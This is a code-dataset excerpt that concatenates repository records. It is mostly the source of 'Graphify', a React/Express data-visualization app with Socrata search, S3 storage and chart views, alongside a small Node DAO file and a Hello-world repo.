branch_name stringclasses 149 values | text stringlengths 23 89.3M | directory_id stringlengths 40 40 | languages listlengths 1 19 | num_files int64 1 11.8k | repo_language stringclasses 38 values | repo_name stringlengths 6 114 | revision_id stringlengths 40 40 | snapshot_id stringlengths 40 40 |
|---|---|---|---|---|---|---|---|---|
refs/heads/master | <file_sep>const {User} = require('../models/user')
const bcrypt = require('bcryptjs')
const {Admin} = require('../models/admin')
// data access object
// Data-access object for admin lookups.
class UserDao {
  /**
   * Fetch a single admin record by primary key.
   * @param {number|string} v - the admin's id.
   * @returns {Promise<Object|null>} the matching admin, or null when not found.
   */
  static async getInfo(v) {
    // 'bh' scope presumably hides sensitive columns (e.g. password hash) —
    // TODO confirm against the Admin model definition.
    const scope = 'bh';
    // BUG FIX: the original queried `where: { id }`, but no `id` was in scope
    // (ReferenceError at runtime); the parameter `v` is the id to look up.
    const user = await Admin.scope(scope).findOne({
      where: {
        id: v
      }
    })
    return user
  }
}
module.exports = {
UserDao
} | cdbb3575e743b0d49860df54e30e961a418fdc16 | [
"JavaScript"
] | 1 | JavaScript | xxh930818/nodejs-koa | db6fda5f1979aa080ad1ca8ab53b73f1e5a6fdef | ff37d00180d38de8441c16a6bb42f1635f6b6dd3 |
refs/heads/master | <repo_name>Mangesh242/Hello-world<file_sep>/app.js
// Demo script: prints greetings to stdout (run with `node app.js`).
console.log("Hello World");
console.log("added new member to code");
<file_sep>/README.md
# Hello-world
just a repository
PR request example
to run program
node app.js
| ea3391e5f5b439fa517025135282b7b8799e8526 | [
"JavaScript",
"Markdown"
] | 2 | JavaScript | Mangesh242/Hello-world | 081774c1b203533b253cf512bb22f047f3f38f5a | 4ea31e79621d5904adc7c3d220eee54f91092695 |
refs/heads/master | <file_sep>const router = require('express').Router();
const soda = require('soda-js');
module.exports = router;
// Proxy a Socrata (SODA) dataset lookup: GET /?id=<datasetId>&domain=<socrataDomain>
// Responds with the dataset rows as JSON.
router.get('/', (req, res, next) => {
  const { id, domain } = req.query;
  if (!id || !domain) {
    // Guard: soda-js throws unhelpfully on missing domain/id.
    return res.status(400).send('Both `id` and `domain` query params are required');
  }
  const consumer = new soda.Consumer(domain);
  consumer.query()
    .withDataset(id)
    .getRows()
    // BUG FIX: the original only console.logged the rows/error, so the HTTP
    // request never received a response and hung until the client timed out.
    .on('success', rows => res.json(rows))
    .on('error', error => next(error));
})
const {User, Graph, Dataset} = require('../db/models')
const axios = require('axios')
const {AWS_KEY, AWS_SECRET, AWS_BUCKET} = process.env || require('../../secrets')
const AWS = require('aws-sdk')
// set all the keys and region here
AWS.config.update({
accessKeyId: AWS_KEY,
secretAccessKey: AWS_SECRET,
region: 'us-east-2'
})
module.exports = router
// Authenticate by email + password; responds with the user (including their
// graphs and datasets) on success, 401 on bad credentials.
router.post('/login', async (req, res, next) => {
  try {
    const user = await User.findOne({
      where: {
        email: req.body.email
      },
      include: [{model: Graph}, {model: Dataset}]
    })
    if (!user) {
      console.log('No such user found:', req.body.email)
      res.status(401).send('Wrong username and/or password')
    } else if (!user.correctPassword(req.body.password)) {
      console.log('Incorrect password for user:', req.body.email)
      res.status(401).send('Wrong username and/or password')
    } else {
      // Establish the session, then echo the user back to the client.
      req.login(user, err => (err ? next(err) : res.json(user)))
    }
  } catch (err) {
    // BUG FIX: the original async handler had no try/catch, so a DB failure
    // became an unhandled promise rejection instead of reaching Express's
    // error middleware.
    next(err)
  }
})
// Create a new account and immediately establish a login session for it.
router.post('/signup', async (req, res, next) => {
  try {
    const newUser = await User.create(req.body)
    req.login(newUser, loginErr => {
      if (loginErr) {
        next(loginErr)
      } else {
        res.json(newUser)
      }
    })
  } catch (err) {
    // A duplicate email violates the unique constraint on the users table.
    if (err.name !== 'SequelizeUniqueConstraintError') {
      next(err)
      return
    }
    res.status(401).send('User already exists')
  }
})
// Destroy the login session and redirect to the landing page.
router.post('/logout', (req, res) => {
req.logout()
req.session.destroy()
res.redirect('/')
})
// Return the current session's user (undefined body when not logged in).
router.get('/me', (req, res) => {
res.json(req.user)
})
router.use('/google', require('./google'))
<file_sep>const router = require('express').Router();
const {Graph, YAxis, Dataset} = require('../db/models')
const {AWS_KEY, AWS_SECRET, AWS_BUCKET} = process.env || require('../../secrets')
const AWS = require('aws-sdk')
// set all the keys and region here
AWS.config.update({
accessKeyId: AWS_KEY,
secretAccessKey: AWS_SECRET,
region: 'us-east-2'
})
module.exports = router;
// Fetch a stored dataset object from S3 by its key and return it as JSON,
// tagging the payload with the key it was fetched under so the client can
// reference it later.
router.get('/:awsId', (req, res, next) => {
  const {awsId} = req.params
  const s3 = new AWS.S3({apiVersion: '2006-03-01'})
  s3.getObject({Bucket: AWS_BUCKET, Key: awsId})
    .promise()
    .then(result => {
      const payload = JSON.parse(result.Body)
      payload.awsId = awsId
      res.json(payload)
    })
    .catch(next)
})
// Return the S3 object stored under a graph's id (the saved graph payload).
router.get('/graph/:graphId', (req, res, next) => {
  const {graphId} = req.params
  const s3 = new AWS.S3({apiVersion: '2006-03-01'})
  s3.getObject({Bucket: AWS_BUCKET, Key: graphId})
    .promise()
    .then(result => {
      res.json(JSON.parse(result.Body))
    })
    .catch(next)
})
// Persist a graph's rendered image (a data-URL blob) to S3 under the graph
// id; responds with the id on success.
router.post('/graph/:graphId', (req, res, next) => {
  const {graphId} = req.params
  const {svgBlob} = req.body
  const body = JSON.stringify({svgBlob})
  const s3 = new AWS.S3({apiVersion: '2006-03-01'})
  s3.putObject({Bucket: AWS_BUCKET, Key: graphId, Body: body})
    .promise()
    .then(() => {
      res.status(200).send(graphId)
    })
    .catch(next)
})
<file_sep>import React, {Component} from 'react'
import ShowSearchResults from './ShowSearchResults.jsx'
import history from '../history'
import {getSocrataCategories, searchSocrataForDatasets} from '../componentUtils'
// Search page component: a text search over Socrata's public dataset catalog
// with an optional category filter. The current query/filter are mirrored in
// the URL (?query=...&filter=...) so searches are shareable/bookmarkable.
export default class SearchBar extends Component {
constructor(props) {
super(props)
this.state = {
results: [],
search: '',
showResults: false,
submittedSearch: '',
searchCategories: [],
filter: 'no filter'
}
this.handleChange = this.handleChange.bind(this)
this.handleFilter = this.handleFilter.bind(this)
this.handleSubmit = this.handleSubmit.bind(this)
}
// Parses ?query= and &filter= out of the URL, loads the category list, and
// replays the search (by programmatically clicking the search button) when
// the URL carried a query or filter.
componentDidMount() {
const {search} = this.props.location
const queryIndex = search.indexOf('?query=')
const filterIndex = search.indexOf('&filter=')
let filter = 'no filter'
let searchbar = ''
let end = filterIndex === -1 ? search.length : filterIndex
if (queryIndex !== -1) {
// 7 === '?query='.length; %20 sequences are turned back into spaces.
searchbar = search.slice(queryIndex + 7, end).replace(/%20/g, ' ')
}
if (filterIndex !== -1) {
// 8 === '&filter='.length
filter = search.slice(filterIndex + 8).replace(/%20/g, ' ')
}
getSocrataCategories()
.then(categories => {
// Only accept a filter from the URL if Socrata actually knows it.
let setFilter = categories.includes(filter) ? filter : 'no filter'
this.setState({
search: searchbar,
searchCategories: categories,
filter: setFilter
})
if (queryIndex !== -1 || filterIndex !== -1) {
document.getElementById('search-button').click()
}
})
.catch(console.error)
}
handleChange(event) {
const search = event.target.value
this.setState({search})
}
handleFilter(event) {
const filter = event.target.value
this.setState({filter})
}
// Runs the catalog search and pushes the query into the URL.
handleSubmit(event) {
event.preventDefault()
const {search} = this.state
// 'no filter' is the sentinel for "all categories" and maps to an empty
// category param in the API call.
const filter = this.state.filter === 'no filter' ? '' : this.state.filter
searchSocrataForDatasets(search, filter)
.then(results => {
this.setState({results, showResults: true, submittedSearch: search})
history.push(`/search?query=${search}&filter=${filter}`)
})
.catch(console.error)
}
render() {
const {results, submittedSearch, searchCategories} = this.state
return (
<div>
<h2 id="searchbar-name">Search among more than 10,000 datasets</h2>
<form onSubmit={this.handleSubmit}>
<input
placeholder="Search Dataset"
className="searchbar-input"
onChange={this.handleChange}
name="searchbar"
value={this.state.search}
/>
<div className="searchbar-select">
{searchCategories.length > 0 && (
<select onChange={this.handleFilter} value={this.state.filter}>
<option hidden value="no filter">
Select Category
</option>
{searchCategories.map(category => (
<option value={category} key={category}>
{category}
</option>
))}
</select>
)}
<button type="submit" id="search-button">
Search
</button>
</div>
</form>
<br />
<div className="searches">
{this.state.showResults && (
<ShowSearchResults results={results} search={submittedSearch} />
)}
</div>
</div>
)
}
}
<file_sep>const { getDatasetFromS3, getGraphImgFromS3 } = require('./AWSutils')
module.exports = {
getDatasetFromS3,
getGraphImgFromS3
}<file_sep>import React, {Component} from 'react'
import CSVReader from 'react-csv-reader'
import store, {uploadData, resetGraphSettings} from '../store'
import history from '../history'
// Landing page: lets the user either search the hosted datasets or upload a
// CSV (parsed client-side by react-csv-reader) to start graphing.
export default class Home extends Component {
constructor(props) {
super(props)
this.handleUpload = this.handleUpload.bind(this)
this.handleSearch = this.handleSearch.bind(this)
}
// Invoked by CSVReader with the parsed rows and the uploaded file's name;
// clears any previous graph settings before loading the new data.
handleUpload(data, fileName) {
store.dispatch(resetGraphSettings())
store.dispatch(uploadData(data, fileName))
}
// Resets graph settings and navigates to the search page.
handleSearch(event) {
event.preventDefault()
store.dispatch(resetGraphSettings())
history.push('/search')
}
render() {
return (
<div id="home">
<div>
<h1 id="home-name">GRAPHIFY</h1>
<h3>Graph Your World</h3>
</div>
<div id="home-buttons-container">
<button className="home-buttons" onClick={this.handleSearch}>
Search Our Datasets
</button>
<div className='home-buttons'>
Upload File
<CSVReader
cssClass="react-csv-input"
onFileLoaded={this.handleUpload}
/>
</div>
</div>
</div>
)
}
}
<file_sep>const Sequelize = require('sequelize')
const db = require('../db')
// Sequelize model for a saved graph's display settings. The heavyweight data
// (the dataset itself and the rendered image) live in S3; `graphId` is the
// public share id and doubles as the S3 key for the rendered image.
const Graph = db.define('graph', {
graphId: {
type: Sequelize.STRING
},
// Name of the dataset column plotted on the x axis.
xAxis: {
type: Sequelize.STRING
},
title: {
type: Sequelize.STRING,
defaultValue: ''
},
description: {
type: Sequelize.TEXT,
defaultValue: ''
},
xAxisLabel: {
type: Sequelize.STRING,
defaultValue: ''
},
yAxisLabel: {
type: Sequelize.STRING,
defaultValue: ''
},
// One of the supported chart kinds ('Line', 'Bar', 'Pie', ... as consumed
// by the chart-type switch in the React views).
graphType: {
type: Sequelize.STRING,
defaultValue: ''
},
thumbnail: {
type: Sequelize.STRING,
defaultValue: 'graph.gif'
},
// Per-series colors, consumed in y-axis order by the chart components.
colors: {
type: Sequelize.ARRAY(Sequelize.STRING),
defaultValue: ['#8884d8', '#82ca9d', '#ffc658', '#FF8042']
}
})
module.exports = Graph
<file_sep>import axios from 'axios';
// Fetch the list of category names known to the Socrata catalog.
// BUG FIX: the trailing `.catch(console.error)` was removed — it swallowed
// failures and resolved with `undefined`, which then crashed callers (e.g.
// `categories.includes(...)` in SearchBar) with a misleading TypeError.
// Errors now propagate so each caller's own .catch handles them.
export const getSocrataCategories = () => {
  return axios.get('https://api.us.socrata.com/api/catalog/v1/categories')
    .then(res => res.data.results)
    .then(categories => categories.map(category => category.category));
}

// Full-text dataset search against the Socrata catalog, optionally
// restricted to a category ('' means no restriction). Resolves to the raw
// catalog response ({results, resultSetSize, ...}).
export const searchSocrataForDatasets = (search, category) => {
  // Encode user input so spaces/&/# in the query cannot corrupt the URL.
  const q = encodeURIComponent(search);
  const cat = encodeURIComponent(category);
  return axios.get(`https://api.us.socrata.com/api/catalog/v1?only=datasets&q=${q}&categories=${cat}`)
    .then(res => res.data);
}
<file_sep>import React from 'react'
// Card shown in search results: dataset title (clickable), permalink, and a
// description truncated to the first 20 words.
const DatasetPreview = (props) => {
const { result } = props;
// First 20 words of the description; '...' is appended below when the slice
// is full (i.e. the description may have been cut off).
const description = result.resource.description.split(' ').slice(0, 20);
return (
<div className="dataset-preview">
<a className="dataset-preview-link" onClick={(event) => props.handleClick(event, result)}>
<h3>{result.resource.name}</h3>
</a>
<h5 className="dataset-preview-permalink">{result.permalink}</h5>
<h4 className="dataset-preview-detail">{description.length === 20 ? description.join(' ') + '...' : description.join(' ')}</h4>
</div>
)
}
export default DatasetPreview;
<file_sep>
export * from './popupCreators'
export * from './socrataFunctions'<file_sep>import React, { Component } from 'react'
import { connect } from 'react-redux'
import {
LineChartGraph,
BarChartGraph,
AreaChartGraph,
RadarChartGraph,
ScatterChartGraph,
PieChartGraph
} from './graphs'
import {
updateTitle,
updateDescription,
updateXAxisName,
updateYAxisName,
updateColor,
fetchAndSetGraph,
fetchAndSetDataFromS3,
saveGraphSettingToDB
} from '../store'
import { HuePicker } from 'react-color'
import axios from 'axios'
import FileSaver from 'file-saver'
import { toast, ToastContainer } from 'react-toastify'
import { SharePopup } from '../componentUtils'
import htmlToImage from 'html-to-image'
import {CURRENT_HOST} from '../../secrets'
axios.defaults.baseURL = `http://${CURRENT_HOST}`
class SingleGraphView extends Component {
constructor(props) {
super(props)
this.state = {
legend: -1
}
this.handleChange = this.handleChange.bind(this)
this.handleChangeColor = this.handleChangeColor.bind(this)
this.handleSave = this.handleSave.bind(this)
this.handleClone = this.handleClone.bind(this)
this.exportChart = this.exportChart.bind(this)
this.exportSVG = this.exportSVG.bind(this)
this.giveLink = this.giveLink.bind(this)
}
componentDidMount() {
const { graphId } = this.props.match.params
const { getGraphId } = this.props
this.props.getGraphId(graphId)
}
// Exports the graph as embedded JS or PNG
exportChart(asSVG) {
const chartSVG = document.getElementById('single-graph-container-chart').children[0]
htmlToImage.toJpeg(chartSVG, { backgroundColor: '#FFFFFF', height: 700, width: 700, style: { margin: 'auto', verticalAlign: 'center' } })
.then((dataUrl) => {
let link = document.createElement('a');
link.download = `${this.props.graphSettings.title}.jpeg`;
link.href = dataUrl;
link.click();
})
}
exportSVG() {
const chartSVG = document.getElementById('single-graph-container-chart').children[0]
toast('SVG Copied', {
autoClose: 3000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
return new XMLSerializer().serializeToString(chartSVG)
}
handleChange(event) {
const name = event.target.name
const value = event.target.value
const {
changeTitle,
changeXAxisName,
changeYAxisName,
addDescription
} = this.props
switch (name) {
case 'title':
return changeTitle(value)
case 'description':
return addDescription(value)
case 'XAxis':
return changeXAxisName(value)
case 'YAxis':
return changeYAxisName(value)
}
}
handleClick(idx) {
this.setState({ legend: idx })
}
handleChangeColor(color) {
this.props.changeColor(color.hex, this.state.legend)
this.setState({ legend: -1 })
}
handleClone() {
const {
currentX,
currentY,
title,
xAxisName,
yAxisName,
colors,
graphType,
description
} = this.props.graphSettings
const { awsId, name } = this.props.dataset
return axios
.post(`api/graphs`, {
xAxis: currentX,
yAxis: currentY,
xAxisLabel: xAxisName,
yAxisLabel: yAxisName,
colors,
title,
graphType,
datasetName: name,
description,
awsId
})
.then(res => {
const chartSVG = document.getElementById('single-graph-container-chart').children[0]
return htmlToImage.toJpeg(chartSVG, { backgroundColor: '#FFFFFF', height: 700, width: 700, style: { margin: 'auto', verticalAlign: 'center' } })
.then((dataUrl) => {
return axios.post(`/api/aws/graph/${res.data}`, {
svgBlob: dataUrl
})
})
})
.then(res => {
this.props.history.push(`/graph-dataset/customize/${res.data}`)
return this.props.getGraphId(res.data)
})
.then(() => {
return toast('Graph Cloned', {
autoClose: 4000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
})
.catch(console.error)
}
handleSave(graphId) {
const settings = this.props.graphSettings
this.props.saveGraphSetting(graphId, settings)
toast('Graph Saved', {
autoClose: 3000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
const chartSVG = document.getElementById('single-graph-container-chart').children[0]
return htmlToImage.toJpeg(chartSVG, { backgroundColor: '#FFFFFF', height: 700, width: 700, style: { margin: 'auto', verticalAlign: 'center' } })
.then((dataUrl) => {
return axios.post(`/api/aws/graph/${graphId}`, {
svgBlob: dataUrl
})
})
.catch(console.error)
}
giveLink() {
toast('Link Copied', {
autoClose: 3000,
hideProgressBar: false,
closeOnClick: true,
pauseOnHover: true
})
return `${CURRENT_HOST}/graph-dataset/customize/${this.props.match.params.graphId}`
}
render() {
const { graphId } = this.props.match.params
let { currentY, graphType, colors, description } = this.props.graphSettings
const image = this.state.image
return (
<div id="single-graph">
<div id="single-graph-buttons">
<button
id="single-graph-buttons-save"
type="submit"
onClick={() => this.handleSave(graphId)}
>
Save
</button>
<button id="single-graph-buttons-clone" onClick={this.handleClone}>
Clone
</button>
{SharePopup(
<button id="single-graph-buttons-share">Share</button>,
this.exportChart,
this.giveLink,
this.exportSVG
)}
</div>
<div id="single-graph-container">
<div id="single-graph-container-chart">
{(function () {
switch (graphType) {
case 'Line':
return <LineChartGraph />
case 'Bar':
return <BarChartGraph />
case 'Area':
return <AreaChartGraph />
case 'Radar':
return <RadarChartGraph />
case 'Scatter':
return <ScatterChartGraph />
case 'Pie':
return <PieChartGraph />
default:
return null
}
})()}
</div>
<div id="single-graph-container-settings">
<div id="single-graph-container-settings-container">
<form>
<label>Title</label>
<input
className="single-graph-input"
type="text"
name="title"
onChange={this.handleChange}
/>
<label>X axis Name</label>
<input
className="single-graph-input"
type="text"
name="XAxis"
onChange={this.handleChange}
/>
<label>Y axis Name</label>
<input
className="single-graph-input"
type="text"
name="YAxis"
onChange={this.handleChange}
/>
<label>Description</label>
<input
className="single-graph-input"
type="text"
name="description"
onChange={this.handleChange}
/>
</form>
<div>
{currentY.map((yAxis, idx) => (
<div key={idx}>
<label>{`${yAxis[0].toUpperCase()}${yAxis.slice(
1
)} Color`}</label>
<button
className="single-graph-settings-buttons"
onClick={() => this.handleClick(idx)}
>
Pick Color
</button>
{this.state.legend !== -1 ? (
<div>
<div onClick={this.handleClose} />
<HuePicker
color={colors[idx]}
onChangeComplete={this.handleChangeColor}
/>
</div>
) : null}
</div>
))}
</div>
</div>
</div>
</div>
<div id="current-chart-description">
{description.length !== '' ? (
<div className="current-chart-description">
<h3>Description:</h3>
<p>{`${description}`}</p>
</div>
) : null}
</div>
<ToastContainer className="toast" />
</div>
)
}
}
const mapState = state => {
return {
graphSettings: state.graphSettings,
dataset: state.dataset
}
}
const mapDispatch = dispatch => ({
changeTitle(title) {
dispatch(updateTitle(title))
},
addDescription(description) {
dispatch(updateDescription(description))
},
changeXAxisName(name) {
dispatch(updateXAxisName(name))
},
changeYAxisName(name) {
dispatch(updateYAxisName(name))
},
changeColor(color, idx) {
dispatch(updateColor(color, idx))
},
getGraphId: graphId => {
dispatch(fetchAndSetGraph(graphId))
},
getDataset: graphId => {
dispatch(fetchAndSetDataFromS3(graphId))
},
saveGraphSetting: (graphId, settings) => {
dispatch(saveGraphSettingToDB(graphId, settings))
}
})
export default connect(mapState, mapDispatch)(SingleGraphView)
<file_sep>import React, { Component } from 'react'
import store, {getAsyncData} from '../store'
import SearchDatasetPreview from './SearchDatasetPreview'
// Renders the list of Socrata search hits; clicking a hit loads that dataset
// into the redux store (and from there into the graphing flow).
export default class ShowResults extends Component {
constructor(props) {
super(props)
this.handleClick = this.handleClick.bind(this);
}
// Builds a column-name -> column-datatype map from the Socrata result
// metadata and kicks off the async fetch of the selected dataset.
handleClick(event, result) {
event.preventDefault();
const domain = result.metadata.domain;
const id = result.resource.id;
const datasetName = result.resource.name;
let columObj = {};
result.resource.columns_name.forEach((columnName, i) => {
columObj[columnName] = result.resource.columns_datatype[i];
})
store.dispatch(getAsyncData(domain, id, columObj, datasetName));
}
render() {
// props.results is the raw catalog response; its .results is the hit array.
const { results } = this.props.results;
const {search} = this.props;
return (
<div className="search-results">
{results.length > 0 ?
results.map((result, idx) => {
return (
<div className="search-results-dataset search-results-dataset-box" key={result.resource.id}>
<SearchDatasetPreview result={result} handleClick={this.handleClick} />
</div>
)
}) : <h2>Results not found for {search}</h2>
}
</div>
)
}
}
<file_sep>## Graphify
Graphify is a data-visualization web app that allows users to easily upload and save datasets and to create and share customizable charts. It also allows users to search and visualize more than 10,000 public datasets.
Upload your own data or search it from public datasets
Graphify allows users to upload and save their own datasets, and immediately begins to explore different ways of displaying them. For managing the storage of datasets, we use AWS. Users can also search public datasets via Socrata Open Data API.
Display graphs based on users' selected data
Once users select data, Graphify automatically creates previews with all available charts. If users are not sure which graph would best represent their data, Graphify also gives a recommendation based on the selected data.
Graph Types Available
- Line Graph
- Bar Graph
- Pie Chart
- Scatterplot
- Area Chart
- Radar Chart
Edit, share and clone graphs in real time
Users can not only customize graphs to their specifications — title, names of the X and Y axes, legend, colors, etc. — but also share their graphs through a unique link, embed them as an SVG file, and download them as an image. Users can also clone a selected graph and save any changes they make to their profile.
Technologies applied
- Node.js
- ReactJS
- Redux
- AWS S3
- D3.js
- Soda-js
- RechartJs
- Express
- Sequelize
- PostgreSQL
- Reactjs-popup
- react-toastify
- React-table
- React-color
- React-CSV-reader
<file_sep>import React, {Component} from 'react'
import {connect} from 'react-redux'
import {Link} from 'react-router-dom'
import {
meAndGraphImages,
fetchAndSetDataFromS3,
resetGraphSettings,
deleteDataset,
deleteGraph
} from '../store'
import {ToastContainer} from 'react-toastify'
import {DeletePopup} from '../componentUtils'
import renderHtml from 'react-render-html'
import axios from 'axios'
import htmlToImage from 'html-to-image'
export class UserProfile extends Component {
constructor(props) {
super(props)
this.state = {}
}
componentDidMount() {
this.props.meAndGraphImages().then(res => {
this.props.user.graphs.forEach(graph => {
const {graphId} = graph
this.setState({[graphId]: ''})
})
let thisPromise = this.props.user.graphs.map(graph => {
this.getGraphImages(graph.graphId)
.then(res => {
const {graphId} = graph;
this.setState({[graphId]: res.svgBlob})
})
})
Promise.all(thisPromise)
.catch(console.error)
})
}
handleDatasetClick = awsId => {
this.props.resetGraphSettings()
this.props.fetchAndSetDataFromS3(awsId)
}
handleDeleteDataset = (datasetId, close) => {
this.props.deleteDataset(datasetId)
close()
}
handleDeleteGraph = graphId => {
this.props.deleteGraph(graphId)
}
getGraphImages = graphId => {
return axios
.get(`/api/graphs/aws/images/${graphId}`)
.then(res => {
return res.data
})
.catch(console.error)
}
render() {
const {graphs, datasets} = this.props.user
return (
<div id="profile">
<div id="profile-content">
<div id="profile-datasets">
<h2 className="profile-title">My Datasets</h2>
<div id="profile-datasets-wrapper">
{datasets &&
datasets.map(dataset => (
<div key={dataset.id} className="dataset-link">
<a onClick={() => this.handleDatasetClick(dataset.awsId)}>
<h3 id="profile-datasets-wrapper-name">{dataset.name}</h3>
</a>
{DeletePopup(
<button className="delete-dataset-and-graph">x</button>,
this.handleDeleteDataset,
dataset.id,
'dataset'
)}
</div>
))}
</div>
</div>
<div id="profile-graphs">
<h2 className="profile-title">My Graphs</h2>
<div id="profile-graphs-wrap">
{graphs &&
graphs.map(graph => (
<div key={graph.id} className="profile-graphs-single">
<Link to={`/graph-dataset/customize/${graph.graphId}`}>
<img src={this.state[graph.graphId]}/>
</Link>
{DeletePopup(
<button className="delete-graph">
Delete graph
</button>,
this.handleDeleteGraph,
graph.id,
'graph'
)}
</div>
))}
</div>
</div>
</div>
<ToastContainer />
</div>
)
}
}
const mapState = state => {
return {
user: state.user
}
}
const mapDispatch = dispatch => ({
meAndGraphImages: () => dispatch(meAndGraphImages()),
resetGraphSettings: () => dispatch(resetGraphSettings()),
fetchAndSetDataFromS3: awsId => dispatch(fetchAndSetDataFromS3(awsId)),
deleteDataset: datasetId => dispatch(deleteDataset(datasetId)),
deleteGraph: graphId => dispatch(deleteGraph(graphId))
})
export default connect(mapState, mapDispatch)(UserProfile)
<file_sep>import React from 'react'
import {connect} from 'react-redux'
import {PieChart, Pie, Tooltip, Legend, ResponsiveContainer} from 'recharts'
// Donut-style pie chart: shows the percentage distribution of the distinct
// values found in the currently selected x-axis column.
export const PieChartGraph = props => {
// Tallies how often each distinct value of `term` occurs in `arr` and
// converts the counts into whole-number percentages of the row count.
function quantityMaker(arr, term) {
let quantityObj = {}
arr.forEach(row => {
let value = row[term]
// `undefined + 1` is NaN, so the `|| 1` initializes first occurrences.
quantityObj[value] = quantityObj[value] + 1 || 1
})
let objArr = Object.keys(quantityObj).map(name => {
return {
name: name,
value: Math.round(quantityObj[name] * 100 / arr.length)
}
})
return objArr
}
const {dataset, graphSettings} = props
// NOTE(review): only currentX, title and colors are used below; the other
// destructured settings are currently unused in this chart.
const {
currentX,
currentY,
title,
xAxisName,
yAxisName,
colors
} = graphSettings
return (
<div className="graph-dataset-graphs-single">
<h2>{title}</h2>
<ResponsiveContainer width="105%" height={550}>
<PieChart>
<Pie
isAnimationActive={true}
data={quantityMaker(dataset.dataset, currentX)}
dataKey="value"
cx={280}
cy={280}
innerRadius={120}
fill={colors[0]}
label
/>
<Tooltip />
</PieChart>
</ResponsiveContainer>
</div>
)
}
const mapState = state => {
return {
dataset: state.dataset,
graphSettings: state.graphSettings
}
}
export default connect(mapState)(PieChartGraph)
<file_sep>const router = require('express').Router()
const {Graph, YAxis, Dataset} = require('../db/models')
const {AWS_KEY, AWS_SECRET, AWS_BUCKET} =
process.env || require('../../secrets')
const AWS = require('aws-sdk')
// set all the keys and region here
AWS.config.update({
accessKeyId: AWS_KEY,
secretAccessKey: AWS_SECRET,
region: 'us-east-2'
})
const {getDatasetFromS3} = require('../utils')
const crypto = require('crypto')
module.exports = router
// Return a graph's settings (DB row incl. y-axes + dataset meta) together
// with the raw dataset fetched from S3: { dataset, graph }.
router.get('/:graphId', (req, res, next) => {
  const {graphId} = req.params
  Graph.findOne({
    where: {graphId},
    include: [{model: YAxis}, {model: Dataset}]
  })
    .then(graph => {
      const {awsId} = graph.dataset.dataValues
      // BUG FIX: the inner promise was not returned, so S3 failures escaped
      // the .catch(next) below as unhandled rejections.
      return getDatasetFromS3(awsId).then(dataset => {
        res.send({dataset, graph})
      })
    })
    .catch(next)
})
// Create a saved graph for the logged-in user: generates a URL-safe share
// id, creates the Graph row, its YAxis rows, and (if needed) the Dataset
// row, then wires up the associations. Responds with the new graphId.
router.post('/', (req, res, next) => {
if (req.user) {
// 8 random bytes, base64'd; '/' is replaced so the id is URL-path safe.
const graphId = crypto
.randomBytes(8)
.toString('base64')
.replace(/\//g, '7')
const {
xAxis,
yAxis,
title,
graphType,
datasetName,
xAxisLabel,
yAxisLabel,
colors,
description,
awsId
} = req.body
const userId = req.user.id
let makingGraph = Graph.create({
userId,
graphId,
xAxis,
title,
graphType,
xAxisLabel,
yAxisLabel,
colors,
description
})
let makingYAxes = Promise.all(
yAxis.map(name => {
return YAxis.create({name})
})
)
// findOrCreate so re-saving a graph of an existing dataset does not
// duplicate the dataset row.
let makingDataset = Dataset.findOrCreate({
where: {
name: datasetName,
userId,
awsId
}
})
return Promise.all([makingGraph, makingYAxes, makingDataset])
.then(([newGraph, newYAxes, newDataset]) => {
// findOrCreate resolves to an [instance, created] pair — hence [0].
let setY = newGraph.setYAxes(newYAxes)
let setDataset = newGraph.setDataset(newDataset[0])
return Promise.all([setY, setDataset])
})
.then(() => res.status(200).send(graphId))
.catch(next)
} else {
res.status(401).send('You need to be a user to save graph data')
}
})
// Overwrite a saved graph's settings and replace its y-axis rows wholesale
// with the set sent by the client. Requires a logged-in user.
router.put('/:graphId', (req, res, next) => {
  if (req.user) {
    const {graphId} = req.params
    const {
      xAxis,
      yAxis,
      xAxisLabel,
      yAxisLabel,
      title,
      description,
      graphType,
      colors
    } = req.body
    // Find the graph (with its current y-axes) identified by the route param.
    Graph.findOne({
      where: {
        graphId
      },
      include: [{model: YAxis}]
    })
      .then(foundGraph => {
        // Apply the new scalar settings.
        let affectedGraph = foundGraph.update({
          xAxis,
          xAxisLabel,
          yAxisLabel,
          title,
          description,
          graphType,
          colors
        })
        // BUG FIX: the destroy() promises used to be fired and forgotten;
        // awaiting them surfaces failures and guarantees the old rows are
        // gone before the new ones are attached.
        let destroyingOldYAxes = Promise.all(
          foundGraph.yAxes.map(oldYAxis => {
            return oldYAxis.destroy()
          })
        )
        // Create the replacement y-axis rows from the names sent.
        let newYAxes = Promise.all(
          yAxis.map(y => {
            return YAxis.create({name: y})
          })
        )
        return Promise.all([affectedGraph, newYAxes, destroyingOldYAxes])
      })
      // Attach the newly created y-axes to the updated graph.
      .then(([updatedGraph, createdAxes]) => {
        return updatedGraph.setYAxes(createdAxes)
      })
      .then(() => {
        res.status(200).send('graph updated')
      })
      .catch(next)
  } else {
    res.status(401).send('You need to be logged in to edit this graph')
  }
})
// Return the dataset stored in S3 under the given key, tagging the nested
// dataset with the key. Requires a logged-in user.
// TODO(review): also verify the user owns this dataset before serving it.
router.get('/aws/:awsId', (req, res, next) => {
  if (!req.user) {
    // BUG FIX: was `res.send(401).send(...)`, which sent "401" as the body
    // with a 200 status and then attempted an invalid second send.
    return res.status(401).send('You must be logged in to access a dataset')
  }
  const {awsId} = req.params
  let datasetParams = {Bucket: AWS_BUCKET, Key: awsId}
  new AWS.S3({apiVersion: '2006-03-01'})
    .getObject(datasetParams)
    .promise()
    .then(result => {
      let parsedDataset = JSON.parse(result.Body)
      parsedDataset.dataset.awsId = awsId
      res.json(parsedDataset)
    })
    .catch(next)
})
// Return the rendered graph image blob stored in S3 under the given key.
// Requires a logged-in user.
router.get('/aws/images/:awsId', (req, res, next) => {
  if (!req.user) {
    // BUG FIX: was `res.send(401).send(...)` — "401" went out as a 200 body
    // and the second .send() was invalid; use res.status(401) instead.
    return res.status(401).send('You must be logged in to access a dataset')
  }
  const {awsId} = req.params
  let datasetParams = {Bucket: AWS_BUCKET, Key: awsId}
  new AWS.S3({apiVersion: '2006-03-01'})
    .getObject(datasetParams)
    .promise()
    .then(result => {
      let parsedImage = JSON.parse(result.Body)
      res.json(parsedImage)
    })
    .catch(next)
})
// Upload a dataset (rows + column-type map) to S3 under a freshly generated
// URL-safe key; responds with the key. Requires a logged-in user.
router.post('/aws', (req, res, next) => {
if (req.user) {
// 8 random bytes, base64'd; '/' is replaced so the key is URL-path safe.
const awsId = crypto
